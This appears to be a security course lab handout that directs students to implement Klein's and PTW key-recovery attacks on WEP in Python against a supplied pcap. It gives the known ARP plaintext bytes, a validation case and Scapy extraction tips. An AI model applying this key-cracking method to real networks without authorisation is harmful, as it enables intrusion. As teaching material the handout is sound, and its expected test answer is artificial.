Follow the two papers listed below to implement WEP attack on WiFi.

Breaking 104 bit WEP in less than 60 seconds

Klein’s and PTW Attacks on WEP

Implement Klein’s Attack and PTW Attack

Write Python code to implement Klein’s attack. To test the code, you are provided a pcap file sample traffic which includes sufficient amount of ARP traffic. The targeted AP MAC address is 0c:80:63:58:c1:e5.

  • Eq (22) in the second paper is the key. Write a function takes Key, i, X to calculate K[i].

    ​ To validate your function, when Key = b'\x05\xf5\x03', i = 3,X = [214, 122,22] , result should be 234.

  • Find all packets sending from the targeted AP with 36 bytes (ARP packet). Since we know the original data known_data = [ 0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06, 0x00, 0x01, 0x08, 0x00, 0x06, 0x04, 0x00, 0x01 ], we can get X by xor(known_data, wepdata). Read section 5 of the first paper.

  • Key is iv concatenating with cracked key.

  • For each captured ARP packet, generate a vote for a key byte. Read the last three paragraph of section 4 of the second paper.

Useful Python Tips:

  • For ARP packet encrypted by WEP, the size is 36. You can extract the WEP layer by calling getlayer(Dot11WEP). Once you have the WEP layer (say w), the IV is w.iv and data is w.wepdata.
  • Convert an int array to byte array: bytearray(int_array)
  • Convert a string to byte array: bytearray("string","utf-8")
  • Xor operation on two numbers: n1 ^ n2